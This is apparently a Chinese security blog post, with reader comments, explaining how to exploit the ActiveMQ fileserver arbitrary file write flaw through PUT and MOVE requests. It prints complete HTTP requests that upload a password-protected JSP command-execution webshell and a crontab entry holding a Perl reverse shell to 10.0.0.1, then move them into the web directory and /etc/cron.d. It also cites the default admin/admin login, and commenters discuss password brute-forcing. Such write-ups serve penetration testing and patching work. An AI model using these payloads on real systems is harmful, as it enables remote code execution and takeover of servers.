ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:
- 其使用率并不高
- 文件操作容易出现漏洞
所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
在测试过程中,可以关注ActiveMQ的版本,避免走弯路。
本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。
文件写入有几种利用方法:
- 写入webshell
- 写入cron或ssh key等文件
- 写入jar或jetty.xml等库和配置文件
写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。
分别说一下上述几种利用方法。
写入webshell
前面说了,写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问
默认的ActiveMQ账号密码均为admin,首先访问http://ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:
然后上传webshell:
PUT /fileserver/1.txt HTTP/1.1 Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Length: 380 <% if("chaplin".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
移动webshell到web目录下的api文件夹(/opt/activemq/webapps/api/cmd.jsp)中:
MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///opt/activemq/webapps/api/cmd.jsp Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close
访问webshell(需要登录),默认的账号密码都是admin,实战中有弱口令就非常棒了:
写入crontab,自动化弹shell
这是一个比较稳健的方法,首先上传cron配置文件(注意,换行一定要/n,不能是/r/n,否则crontab执行会失败):
PUT /fileserver/2.txt HTTP/1.1 Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Length: 241 */1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
将其移动到/etc/cron.d/root:
MOVE /fileserver/2.txt HTTP/1.1 Destination: file:///etc/cron.d/root Host: 192.168.0.102:8161 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close
如果上述两个请求都返回204了,说明写入成功。等待反弹shell:
这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。
写入jetty.xml或jar
理论上我们可以覆盖jetty.xml,将admin和api的登录限制去掉,然后再写入webshell。
有的情况下,jetty.xml和jar的所有人是web容器的用户,所以相比起来,写入crontab成功率更高一点。
尚未测试。
河南省郑州市 1F
这种漏洞也太老了吧,现在用5.14以后的版本就没事了。
广东省深圳市 B1
@ 幻彩琉璃 老洞归老洞,很多内网系统还是老版本,讲清楚没毛病。
山西省太原市 2F
之前测试遇到过,fileserver默认关掉确实安全多了。
上海市 3F
写crontab弹shell那个方法,如果activemq不是root跑的话是不是就没用了?
山东省滨州市 4F
实战中遇到admin弱口令的概率大吗?
巴基斯坦 5F
感觉操作步骤挺清晰的,适合入门上手。
江苏省徐州市 6F
有谁试过写入jar文件吗?想知道成功率怎么样。
黑龙江省大庆市 7F
这个漏洞利用门槛感觉不算高,但前提条件挺多的。
广东省广州市 8F
图片里标出来的路径是关键,不知道绝对路径就挺麻烦的。
浙江省 9F
这种老洞现在在外部互联网上应该很少见了吧,主要在内网?
日本 10F
MOVE请求这个点确实容易被忽略,设计上就有问题。
江苏省常州市 11F
写入crontab那个方法得是root权限才行,条件有点苛刻了。
湖南省长沙市 12F
这个洞确实挺经典的,当年不少中招的。
吉林省 13F
看了下,感觉实际操作起来步骤还挺多的。
广东省湛江市 B1
@ 竹径听雨 步骤多归多,但按着一步步来应该能复现。
陕西省 14F
想问下,如果目标版本是5.14以上,是不是就完全没搞头了?
北京市 15F
之前在内网碰到过这个,当时拿shell还挺顺利的。
日本 16F
默认密码没改的话,admin页面登录进去就简单多了。
浙江省金华市 17F
漏洞原理讲得挺清楚的,比一些文章只给个脚本好。
广东省东莞市 18F
MOVE请求这个设计初衷是好的,但没做好安全过滤。
广东省广州市 B1
@ 大雪 fileserver本来就不该开放给外网,内部用也得加认证啊。
韩国 19F
对于新手来说,找绝对路径那块可能是个难点。
上海市 B1
@ 镖师周八 图片里标路径那个挺有用的,不然猜半天绝对路径。
台湾省高雄市 20F
感觉webshell那个方法有点绕,不如直接写cron来得直接。
陕西省安康市 B1
@ 船夫黄 webshell那个方法还得先登录,确实麻烦点。
湖北省宜昌市 21F
这个洞确实经典,当年渗透测试经常遇到,现在基本都升级了。
印度 22F
写入crontab那个方法,如果目标不是root权限是不是就白给了?
日本 23F
刚试了下,5.13版本默认fileserver确实是关的,得手动开。
韩国 24F
新手表示看懂了大概,但自己动手估计还得琢磨一会儿。
湖南省长沙市 25F
这种老洞讲得这么细,对复习挺有帮助的。
浙江省杭州市 26F
MOVE请求能移动文件这个设计,现在看简直离谱。
湖北省武汉市 27F
所以关键还是版本和权限,条件满足就很简单。
上海市青浦区 28F
这个洞我去年打靶场时用过,确实得知道绝对路径才好搞。
印度 B1
@ 慵懒的午后 靶场复现还行,实战绝对路径那块真是头疼。
北京市 29F
5.14之后直接删了fileserver,老版本才危险,现在基本遇不到了吧?
北京市 30F
MOVE请求居然能跨目录移动文件,这设计也太随意了🤔
湖北省襄阳市 31F
crontab那个利用方法还挺实用的
贵州省贵阳市 B1
@ Velvet Nightfall 对,crontab那招很稳
江苏省无锡市 32F
新手问下:如果不知道activemq安装路径,有办法爆破或者猜吗?
北京市 33F
之前踩过坑,fileserver默认关了还得去jetty.xml手动开,挺麻烦的。
黑龙江省黑河市北安市 34F
写cron那个方法看着稳,但非root就废了,有点看运气。
湖南省衡阳市 35F
图片里标出/opt/activemq太关键了,没这步后面都白搭。
上海市浦东新区 36F
webshell要登录才能访问,那不如直接爆admin密码更省事?
日本 B1
@ 龙吼战士 直接爆破密码确实是个思路,但得看目标有没有防爆破机制。
江西省吉安市永新县 B1
@ 龙吼战士 所以关键是版本和权限,条件都满足的话拿shell确实快。
广东省广州市 37F
这种老漏洞现在主要在内网遗留系统里才有机会碰上。
天津市 38F
这个洞实战中确实不好碰,得找老系统了。
广东省江门市鹤山市 39F
绝对路径不好搞,有办法盲打或者探测吗?
韩国 40F
写入cron那个方法看着简单,但实际环境root权限的少吧。
湖南省长沙市 41F
老洞了,现在新版本都默认关了fileserver。
北京市丰台区 42F
之前遇到过,fileserver默认关了,还得先去jetty.xml改配置,折腾半天。
山东省 43F
这洞现在基本也就内网靶场玩玩了,外网很少见。
湖北省孝感市 44F
新手看下来感觉步骤挺多,但照着做应该能复现。